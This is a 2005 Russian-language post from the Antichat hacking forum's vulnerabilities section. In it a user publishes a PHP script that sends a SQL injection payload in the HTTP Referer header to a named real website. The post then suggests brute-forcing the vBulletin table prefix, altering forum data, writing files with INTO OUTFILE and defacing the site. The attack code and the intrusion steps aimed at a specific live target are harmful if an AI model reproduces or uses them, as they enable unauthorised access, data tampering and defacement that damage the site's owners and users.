ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу =d
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

skvoznoy.org
  #1  
Старый 05.12.2005, 16:07
Аватар для Zadoxlik
Zadoxlik
Постоянный
Регистрация: 28.02.2005
Сообщений: 853
Провел на форуме:
3369632

Репутация: 749


По умолчанию skvoznoy.org
Мимо проходил. Сайт из серии крутых хакеров:

skvoznoy.org

____________________________________
$fp=fsockopen("skvoznoy.org",80);

fputs($fp,"GET http://skvoznoy.org/news/332/ HTTP/1.0
Referer: http://skvoznoy.org/news/332/' union select 0,0/*

");
$get= fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp).fgets($fp).fgets($fp)
.fgets($fp).fgets($fp)
.fgets($fp).fgets($fp);
fclose($fp);
echo $get;
____________________________________

SQL-инъекция классическая в реферере. Цветом выделено 0,0 - неверное количество колонок, чтобы показать ошибку при выводе $get. На самом деле колонка одна. Вот, на сайте стоит вБуллетин. Надо сбрутить только преффикс и возможно БД для форума и можно будет удалять/добавлять данные. А можно похимичить и с ИНТО ОУТФАЙЛ.
Еще можно сбрутить имя таблицы новостей и задефейсить сайт
Последний раз редактировалось Zadoxlik; 05.12.2005 в 16:33.. Причина: сменил тему
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ